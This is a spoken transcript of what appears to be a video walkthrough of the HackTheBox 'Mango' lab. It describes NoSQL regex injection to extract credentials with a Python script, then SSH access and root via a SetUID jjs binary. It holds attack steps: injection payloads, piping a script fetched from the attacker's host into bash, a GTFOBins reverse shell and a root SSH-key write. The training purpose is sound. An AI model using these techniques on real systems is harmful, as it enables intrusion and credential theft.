What's going on YouTube? This is Ipsec, and we're doing Mango from HackTheBox, which starts off you trying to find a Mongo database. If you can't tell based upon the name and the leaves and all the pictures, this box runs Mongo, which is a NoSQL database. A lot of people used to think NoSQL wasn't injectable because it doesn't feature a lot of the traditional SQL syntax. However, through type confusion, you can make it do interesting things and normally get some type of Boolean injection, as we'll show in this video, by writing a Python script to extract usernames and passwords out of the database and then use them to SSH into the box. And once you get access to the box, privesc is as simple as running like a Linux enumeration script to see a SetUID binary, and then taking that binary and checking GTFO bins and just doing what GTFO bin says. So with all that being said, let's just jump in. As always, we begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it mango, and then the IP address, which is 10.10.10.162. Can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open, the first one being SSH on port 22, and its banner tells us it's a Ubuntu box. Then we have HTTP on port 80. Its banner tells us it's running Apache HTTPD and that it's also an Ubuntu box. And we also have this script HTTP-title running, telling us whenever it tries to get index, the server responds with a 403 forbidden message. We have HTTPS running on 443, the same exact banner as before, but this time that HTTP-title script returns an actual web page, and we see it is the Mango search base. We also have a script, SSL-cert, leaking the hostname of the server, which is staging-order.mango.htb. So I'm going to copy this cert and add it into my host file. So etc host and 10.10.10.162. Paste that domain, and I'm also going to do mango.htb, which is the top level domain. So exit that, and I guess we can move on. The key thing to take away is the configuration for port 80 and 443 is different. We don't know exactly what is different about it. 80 could either just be under a different document root, which is the root of the web server, and that may not have like an index file and directory listings may be disabled. Additionally, it could have a virtual host configuration on port 80, which brings us to a completely different document root when we give it a host name. So I'm just going to go in Cherry Tree and type that out. This box is Mango, interesting, HTTP and HTTPS configs differ. Host name is leaked in SSL cert. So let's go take a look at that SSL certificate and see if there's anything interesting. So I'm going to https://10.10.10.162, click advanced on this, and then click view certificate, go to details, and we'll just go down this list. Sometimes you'll find contact information which leaks, yes, an email address. So we have that. And let's see, what else do we have? The CN that we had before, not after, same exact things. I'm checking if maybe there's an alternate name. Sometimes certificates are good for multiple hosts, but in this case, I didn't see any of that. So let's just go take a look at the server, and then we can go to 10.10.10.162 and specify HTTP to verify, yes, that is a forbidden page. We could take a look at like robots.txt and see if that's there, but we don't get anything. Could run GoBuster on this to try to find hosts, but spoiler, if we go to the actual domain, which is the staging-order.mango.htb, we see it brings us to a page with a login prompt. So let's go take a look at HTTPS first. So if we search things, it doesn't look like we're finding anything. We can do or 1 = 1. And send this over to Burp. Let's see exactly how this does a search. Turn this on, click it. That's not it. Oh, weird. I don't have my Burp SSL cert in this. Let's just accept this request. So we can see this responding, and we get stuff. So what I'm going to do is just put search equals please subscribe, and we can right click this, save item, HTTP boxes, Mango, and search.request, save it, and we can run SQLMap -r. Actually, let's look at search.request. That is not what I wanted. Maybe there's copy to file. I always get these mixed up. There we go. Copy to file is what I want. Search.request. Yes. So now when I less this, I see the actual what's in the repeater window. So I can do SQLMap -r search.request -- batch. So it automatically moves forward whenever it has a question. And what? Oh crap. -- There's a option in Burp to force SSL. Or not Burp, SQLMap. -- force SSL. Force -SSL. There we go. Before it was just going to HTTP and then erroring out because there's no file there that it's looking for. But saying force SSL tells SQLMap to go to the HTTPS version of the site. So now that we have that enumerating, we can go back to Burp, turn intercept off, continue poking at it, look at this, mail goes nowhere. We get this analytics page, which is analytics.php, and it looks like a spreadsheet. Clicking around, it is, I don't know, tough to use. So I looked for ways to interact with the server, and we got this connect remote. So what I tried to do is try to do like server-side request forgery by doing http:// localhost port 22 and seeing what the error message says. Unable to open file. So I do connect, same thing, and we'll do HTTPS localhost on a port that's not listening, so like 9001, and we get the same message. So I was just seeing if there was a way to enumerate what ports were open on the server and maybe do some type of protocol smuggling, but that's not working, so we can probably move on from this. So looking at this, we have to specify an index, trying other things, but no way to enumerate ports it looks like from quick glance. So I'm going to move on to the next thing, and we get this login prompt. I'm going to go back, look at SQLMap. Doesn't look like it's found anything, so nothing there. So we get this login prompt. I'm going to try logging in with admin, and we just get a weird interaction. Let's send this to Burp so we can take a closer look. Send in, go to repeater, and we just get a 200 OK, and it's 4324 bytes. So just remember those numbers. So we can try basic SQL injection to see if we ever get an error. We still get 4324 bytes with the single quote. Try it here on the password. And I'm just trying to force some type of error message. So instead of trying a bunch of things, whoops, did not mean to click that. I'm just going to copy this to a file, and we're going to say this is login.request, and go back here to SQLMap and say login.request, and this is not force SSL because this is the HTTP page. So make sure this starts kicking off, and then we can take a look at this. And this looks a lot like, it reminds me of Mongo, just seeing a bunch of mangoes, which is a NoSQL database. And NoSQL is injectable. So if we turn Firefox off so I can just Google something, NoSQL Injection regex NEGE. This will probably bring us to a good blog post that kind of explains a bunch of things. And essentially, NoSQL injection in, I guess, web applications is a type confusion type vulnerability. So we can see when we're requesting the username not equals to something, it does a weird thing. So you can read those two articles and maybe what I'm about to say will make sense, but I'll attempt to explain it very quickly. We have SQLMap not telling us anything. So let's just go back here and I'm going to do NoSQL primer. So essentially with normal SQL injection, you have select star from username where username is equal to a variable. And if you inject into here, you turn this into like where username is equal to I guess we can do that. Where username is equal to ipsec, or username is not equal to ipsec. So now this will always evaluate to true. We injected this entire thing, and then we generally put like a quote, a comment at the end, so anything the application puts is ignored. But this is essentially what we do in normal SQL injection. We just append a string. In NoSQL, the query is a bit weird. It is like user find one array, and then username is equal to user. So this is kind of like a NoSQL query. And it doesn't really support like or username not equal to user. It doesn't support doing syntax exactly like this. In order to do queries like this, you give it a array or object. Ooh, computer did not like that keystroke. So what we give it is an object and get it to say like not equal to something. And this makes NoSQL translate it. So how do we send an object in web? Well, for PHP applications, we can put it here before this equals. So if we say username is not equal to please subscribe to, and password is not equal to, whoops, password not equal to ipsec. We have to put not equal here. And click send. We now get a 302 found instead of the 200 because we turned the query into the not equals. So we essentially turned this, or had a query like this and made it this, and NoSQL syntax. Not the best with NoSQL, but hopefully that makes sense. There are other things you can do with this. I think I closed the tab. Is there undo close tab? Can we do it? Up here, like regex. And regex is a cool one because we can do regular expressions. So we can turn this, if we want to know like how many characters a username can be, we can say regex, and then it would be begins with, so the character, so this is new line, and then we do a period, which is any character but like a line break, and then 1. So this is repeated once. So do we have a 1 character user? 302 found. I guess we have to put maybe the $sign to terminate it. So we get 200 OK because there's no 1 character passwords. Again, this means start of line and this means end of line. So I'm going to try 2. We get a 200 OK. 3, 4, 5, and we get a 302 found. So we know there's a 5-character username somewhere. And the same exact thing works for the password as well. So we'll go into more of that once we start coding this out. But there's one thing I want to mention, and when you do NoSQL injection, it works this way in PHP normally. But if you go to a language like NodeJS, it's not going to like accept variables like this. So in order to do it in NodeJS, what we would do is instead of telling the application this is www-form-encoded, we change this to application/JSON, I believe. And then this payload, we just convert into JSON. So it would be username, and then not equal to please subscribe to, and then a comma, password, and then we give it the same thing. So not equal to IPsec. Whoops, I need to close this out. And then finally, login is equal to login. So always try something like this, because this will work on like Express.js and things if it's vulnerable. But we get a 200 OK even though this is valid. So the PHP application's not accepting application/JSON. So I'm going to hit Control V a bunch to get this back to where we started. And now let's just send this data to the web server and see what happens upon a valid login. So let's go back to staging mongo.htb, turn intercept on. So go to proxy, intercept is on. Try logging in with IPsec, click login, and we'll change this to be not equal to IPsec, and password is not equal to IPsec. For this request along, we get the redirect, and we just get a page that says under plantation. So I'm going to try to curl just this page, and we still get a 302, and the location points us back to index.php. If we give it a cookie, well, we don't go back to index.php, obviously. So let's run this through GoBuster, but give it a cookie to see if it can find other PHP scripts, because maybe there's something like admin.php that you can only access when you've already logged in. So let's go back to proxy, intercept on, refresh this page, copy this PHP session, and we will do GoBuster dir-h, and we can do -u for URL, HTTP, actually, nope, php/id is my clipboard, so HTTP staging-order.mongo.htb, mango.htb, right? Yeah, staging-order.mango.htb. And we'll do -w for word list, user share word list, user share robust. Oh, I spelled out user. User share word list, GoBuster, directory list 23 medium.txt, -x for extension because we want to look for PHP files, and then the cookies is -c, so we'll do -c, and crap, I just copied that. Copy, paste, go back to Burp, copy that, paste, and then we'll do -o for output file, GoBuster, staging, logged in, .out. So now that we are looking for valid files, we could also try changing this to index.php, but it looks like it will probably just direct us to home.php. No, we still get the login, but we can access home.php just fine. So what we have to do now is probably create a script to enumerate the information inside of Mongo. Because if we look at a repeater, we made a valid login, but through Boolean injection and using the regex parameter, we can actually pull out data. And to do that easily, I'm going to use a script. If you don't want to use a script, you can probably use the paid feature in Burp Intruder. We can probably do this real quick. Positions. So this will be regex, and we'll do starts with data and ends with star, maybe? No. Yeah. We'll do star. Or dot star. Get rid of these. So in Intruder, anything in this little whatever symbol this is will be sent. And I think sniper would be the correct thing. The payloads, add from list A to Z. There we go. And I think that's right. So what this is going to do is take that list A to Z and insert it in between this parameter, if I did this correctly. And then we can sort by status, and we can see upon the data being A or the data being M, we get A302 because the regex for it begins with A, contains any character, and then unlimited number of characters matched. So we got 2 valid users. And we just keep going down this list. So I do A if I want to look at this, start attack, and then sort by status, CD. So that's how I'd go through this in using Burp Suite if I don't want to do any programming. So ADM, we can guess this is probably admin or administrator. And based upon the previous thing of showing us it's 5 characters, it's probably going to be admin. So this is just a stupid way to brute force it. But we don't like stupid ways to brute force here. We want to actually do the privesc. And we can see once I did admin, it's no longer giving us 302s because it's trying to match a character after admin, and it fails to. So we now know the username is admin. So let's code a script in case we didn't have that paid feature or want to do it in a more automated feature. So I'm going to do vi attack.php, and the first module we of course want is request. So did I say attack.php? Attack.py, and import requests. Now what we want to do is just create a function that will return true if our attack was successful. So I'm going to do def inject data, and we can do r is equal to request.post http staging-order.mango.htb, and I think it's just on slash. It is. And the next thing we need to do is data is equal to data, and that should be good. If r.status code, that is this response, is not equal to 200, return true. So now we can do data is equal to username not equal to please subscribe to, and password is not equal to ipsec, and login is equal to login. I think that is correct. We can say if inject.data print success else print failure. So all I'm trying to do is get the skeleton working. So let's do Python 3 attack.py, and we get failure. So something bad happened. Let's go back and do a proxy. So proxies is equal to HTTP, and we need to make this a dict localhost 8080. So now we're sending a request to Burp Suite. So let's go back to Burp, intercept off, turn intercept on, send this, and the first thing we see is request is doing a bunch of URL formatting. And let's see, is there a do intercept response to this request? So I'm going to send this and intercept the response. Was that a check mark? Okay, let's do forward. We get a 302, but our script told us we got a 200. So let's forward this, and then we see /home.php. If we intercept the response to this request, I think there's a hotkey to do that. We get a 200, and then that's it. So a request module is actually following redirects. So if we go back to Firefox, we can Google like Python request do not follow redirect, And if we clicked around here, we'd see there's an allow redirects option right here. So allow redirects equals false. So let's try adding that instead of a proxy. Allow redirects is equal to false. Run this, and now we get success. So we have the skeleton script. What we have to do now is essentially what I showed in Burp Intruder, and that is to repeat a bunch of things. So right now, let's just do it in the username. And what I'm going to do is create a value called secret, and that's going to be what we're brute forcing. And upon a success, I'm going to append a string to secret, and we'll build out what the password is. The next thing we have to do is probably an infinite loop, which is ugly, but this is the easiest way to do this. And then indent all this stuff. So we can start with for I in range, man ASCII. I want to do all characters. Let's just do lowercase. If I wanted to really brute force this, I'd do like all characters. So I'd begin with 41 or 40 if I'm daring to include space, and go all the way to 176. So that would cover like all the ASCII. And there's also Python modules and stuff that you can use to build character maps. So this is just the way I'm going to do it because it's fast. 141 and 176. So range is going to be, wait, what were those numbers? That was the oct numbers. I'm going to work with decimal. I'll say that is not what I was thinking A was. 97 and 126. So I do Python 3 print character of 97. We get A. So 97, 122. So that's going to loop through all lowercase characters. And what I'm going to do here is a little bit of a trick with flushing the output to create a cool little like effect of a spinning character. So I'm going to do print \r, so return character, plus secret, plus char of I. So this is going to be what we're attempting to print, I guess. I guess I could do payload actually. Payload is equal to secret plus char I. And we can do plus payload. Probably should have called that password or something. Naming variables is hard. Naming anything is tough. So do that. And then we say flush is equal to false. And end is equal to nothing. So I don't want a trailing new line because when I put a trailing new line, then it flushes my output. And flush means just like clear the screen. So doing this, we'll just keep erasing the line because of the /r and then printing what we're trying. So it's a pretty cool effect. Yeah, I was going to just run it, but I'd have to input time and do a sleep because it would just go too quick. So don't want to do that. So let's take the data away from there, put it here, and data is equal to begins with plus the payload plus stir. Actually, we don't need stir because I think by default it would do contains. So we'll do that. And then we can say if inject data, then print \r plus secret plus payload flush equals true and equals this. And then secret is equal to secret plus char I and exit this loop. So hopefully this works. So if we do Python 3 attack.py, it doesn't appear to be working. So let's see, where did I screw up? Let's see. While these are cool effects, it makes debugging a pain in the butt. So print payload. Okay. Let's see. What I forgot to do is change this to be regex. So we can see now it trying everything. But we're flushing the input every single time. If we don't flush, we're flushing standard out every time. If we don't flush it, you'll see what that looks like. So now we have it doing something cool like this, which is pretty cool. The downside is right now we have that infinite loop. So once it gets to Z, it's going to repeat. So what we have to do is add something to break this infinite loop. So we can do this up here, and we can say if inject, let's see, let's copy this data, and we can say data is equal to this plus end of line. And we can do if inject data break. So now, and we run this again. Secret is that payload is equal to nothing. A, D, M. So I'm just going to speed up the video and we'll see if this actually breaks. So it correctly broke, and our infinite loop is no longer infinite as long as that one event happens. So if you remember back from when we did this in Burp, we had a username that began with M as well. So in order to quickly, easily do that, I'm just going to say secret starts with M. So this is going to make our script start out at M as the first character. And if I run this, actually, there's one thing I want to do. Let's see. At the very end of the script, after the loop, I want to print a blank line. So our terminal goes on a new line. Let's run this and see what that second user is. We have M-A, N, G, and I'm guessing the final one is O. And that's it. So I can rename this from attack into user.py, or we'll do enum-user.py. And now we have to do something with the password. So let's just say the username is going to be admin, and the password is going to be that regex thing. So regex, we have admin plus payload. Admin regex begins with and has payload. So passwords generally contain uppercase and all those characters. So let's go back to man ASCII, and we're going to start at probably space, which is 32. Second one is decimal, right? Yep. And we're going to go all the way to 126. So 32, 126. It's going to take a lot longer to do. And if we're lucky, it'll work. Oh, we have to get rid of this. Begins with M. So let this run. I'm going to speed up the video and see if it works. Ooh, that's funny. It matched these. Dot, which is anything, and star. So we're going to have a little bit of an issue when it comes to special characters. I didn't really consider that with this. Well, I'm trying to think of a good way to solve this problem other than just not doing those characters, which sucks. So, what if we escape it? I guess we can try escaping. Let's see, v attack.py. Oh, I already have a session. Let's see. While true for range, if character of I is in this array, so we don't want period, question mark, or star, then we will do this payload and escape the special character. So question mark, backspace plus, and based upon syntax highlighting, it wants me to escape the escape, else payload, like that. So that should work. So if we run this, let's see if we get anything. So it made it through the set of special characters, which is good. However, it hasn't given us the first character, which is bad yet. So let's see. We got another bad character that begins with. So we can end, escape that as well. Run this again. And let's see what it is. So this is a bit of a trial and error finding all the special characters for regular expression we have to escape. So I'm going to fast forward up the video to see what the next thing it is. So it looks like we have another bad character, plus, because it keeps going and saying the password is T+++, not, I don't know what's going on there, but let's just escape that. And I guess one of the key things to mention right now is I don't know if this escaping it is working in the sense that we escape the special character's function, or that we just change the payload into be something that would never work. So if the password contains one of those special characters, who knows what's going to happen? We may just think we're done. So we'll cross that bridge if we get there. I'm going to speed up the video till we get to the next bad character. And it looks like we have another bad character that we didn't think of, and that is end of line, which probably means the password is this. So we can copy this and go back here and say interesting, and we can say admin, and that is the password. We could test this out by just trying to log in. So let's clear our cookies. So just clearing everything. Clear the data as well. Come on, clear. Go back to the beginning. And we can try logging in with admin and what is on the clipboard, which is that. If we get back to home, which we did, we have a valid password. So the next thing to do is let's get the actual username, or the other user, which is Mongo. So username, or Mango, I think. It's been a while since we did. I'm pretty sure it was Mango. So let that go. And then we can also try SSH admin at 10.10.10.162. Is that right? Looks right. Paste to see if we can log in with this user. Make sure my clipboard was correct. It was, and we can't log in. So let's run through this second user's password to see if this user gets us anything. I'm just going to fast forward the video now, and we'll come back whenever there's a bunch of $signs on the terminal input, or a weird character that we didn't expect. So, and it looks like maybe we got it, or we got a bad character. I'm not sure why my script just exited. I think this pipe could be a bad character. So let's just try logging in with it and seeing what happens. We got to clear everything again. I guess I could open up DevTool and just clear that one cookie, but this is probably just as easy. So let's try mango and paste this in. We get back to that, and I'm going to try mango and paste it without that caret, and we still get an error message. So let's go back into attack and make sure we're escaping that pipe. Not sure why that just came up now and didn't before, but who knows. So escape all those. Maybe the password has like a plus in it, and that's what's screwing us up. But let's run this, and I'll fast forward the video again because this is a long wait. So we'll see what happens. And this is now looped a few times, and it's not getting the character after this U. So I'm guessing that's going to be something that we tried to escape and did not work. What we could do is we can go paste this in to see exactly how many characters this is. WC-C, it is 9 characters. We can go back to Burp, go to repeater, and the username is equal to Mango, and the password is going to be RegularExpression, begins with, and we'll do $9 to see if the password is 9 characters. Doesn't look like it is. 10, 11, 12, 13, 14, 15. Something's wrong. Let's do 6. 302. So we'll go when this finishes because it didn't seem to like that $. So 9, 10, 11, 12, 13, 14, 20? Okay, it's not 20 characters, so this is just a long password. 16, 17, so probably either 16 characters or 17 characters long. I'm guessing 16, and we got 9 of them. So we have to keep going and figure out exactly where we errored out. So let's copy this, go back into Burp, and say the password is equal to this. If we click send, we get a 302. So we try like backspace plus, we get 200 OK. If we just try a plus, chances are doesn't work. Other special characters. If we try stir, we get that. But if we do backslash stir, we get a 200 OK. Let's see. What are other characters we escaped? So we did period, question mark, stir. So let's try period, 200, question mark, 200, stir, 200. That 200, and I wonder if the password could actually have the pipe, and that was valid. Let's see. What other characters are we missing? Let's go back to code, and let's see. We have for I in range 32, 126. Man ASCII, 32 is space, and 126 is the squiggly. Let's see. Did I do my loop wrong? For I in range 32, 126. Print I. And I did. So it's not doing that very last item. So this probably should be 127. And if we go back here and put that little squiggly, that is 302. So I think that was the issue. So now we have to let the script run again, which is a bit of a pain, but fast forward the video so you don't have to sit through it. So now we keep getting this $sign. So I think we have the password. Let's test it out. If we just try logging in with this password and it works, then we know we got it correctly. So logged in, and we can try the other place to log in, which was SSH. So go down here, do SSH, And we can try mango at that, paste the password in, and we get a shell in the box. So finally, after a long brute force, we have a shell. So the first thing I always do is run the groups command to see what groups we are, look at the home directory, see if there's anything here. We can do find dot. It doesn't really look like it. So let's run the Linux enumeration script from Privilege Escalation Awesome Script Suite, LinPEAS, and we will just Python M, simple HTTP server. Actually, let's do Python 3 because Python 2 is deprecated. Don't want to show that anymore. Run that, if config ton 0 to see what our IP address is, 10.10.14.2. So do we have curl on this box? We do. Curl 10.10.14.2, linpeas.sh, and pipe that output over to bash. So we'll let this script run, and when it does, we'll go over all the results. And I don't even have to let the script finish. Right off the bat, we see it highlighting something in yellow and red, which means it's almost always going to be a privesc path. And we see user lib jvm java and then JJS. So I'm going to take JJS and we're going to go to GTFO bins and see exactly how to use this program. So just paste this in and we have a lot. So we have shell, reverse shell, download write. What does reverse shell do? Wow, it's got quite a bit. So let's see. We can copy that, run nc lmp on attacker thing. So I can control C out of this, and then v exploit.sh, paste all this in, and let's see. So our host is going to be 10.10.14.2, our port 9001, and this looks like it's just doing a Java reverse shell. So we can exploit. Did I do 9001? I did. Bash exploit.sh. We can do nc lvnp 9001, run it, and we get permission denied. lsla user bin jjs. Let's see. lsla etc alternatives jjs. And that's going to this guy, which is only executable by users of the admin group. So we can do cat etc groups or etc group. Look at admin, and that's 1001 for UID. Got etc passwd, and 1001 is only the admin user. So we have to find a way to get over to admin. We have admin's password, so let's just try. Whoops, come on. su-admin, and then do we still have it? We do. We can just copy the password and then paste it in, and it looks like we can get in. So maybe that admin user just can't SSH. So we can go to the Mango home directory and then execute exploit.sh, which we were trying to do before. And let's see. Doesn't look like it worked. Not sure what happened, and I lost my shell. ls, it didn't say connected, so something bizarre happened and I lost everything. So I have to get back in, and I have lost Mango's password, and I did not log it, so that sucks. What we can do is copy this so it starts off where we left off, and we have to rerun our attack.python script. But thankfully, we can just put the secret of our password here. So now our script's going to start all the way there, so we only have a few characters to brute force. And while that goes, let's look up GTFO bins, and we're going to try something else. Let's see. That did not work. I don't know why that didn't, but we can try a file write and just try writing data. This should be much safer to do. Let's see, new file and data. So let us just go into HTTP boxes mango sh-keygen, and we're going to call this file, I guess, mango. And ls, we got mango.pub. We can copy this and v privesc.sh, paste that in, go here, copy this, paste, and privesc.sh. I always hate copying things in VI. I don't know why. You'd think I would have learned it by now, but I always just do it that way. Paste. Okay. So we got Mango's password. It is this. So let's copy this and we'll put it in Cherry Tree. So if we need it again, now we have it. So we can SSH, log in, su to admin, paste this, and then cat privesc. We will have to edit file to write, so privesc.sh. This will be /root /.ssh authorized keys. If this doesn't work, we can try writing like a cron job or something. So cat privesc.sh, copy, paste. And got a bunch of error messages. chmod 600 mango sh-i mango root at 10.10.10 and it's asking us for a password, so that did not work. ls, but we didn't lose a shell. So the next thing I'm going to do is go into this. I'm going to try writing root /.ssh. We can try that. The next thing we're going to do is try writing into temp, and then we can see if the file was created. So paste. We didn't get as many error messages. And there we go. So we are root. So we can do wc-c root.text 33, which is 32 characters in a line break. And that will be the box. Hope you guys enjoyed it. Take care, and I will see you all next week.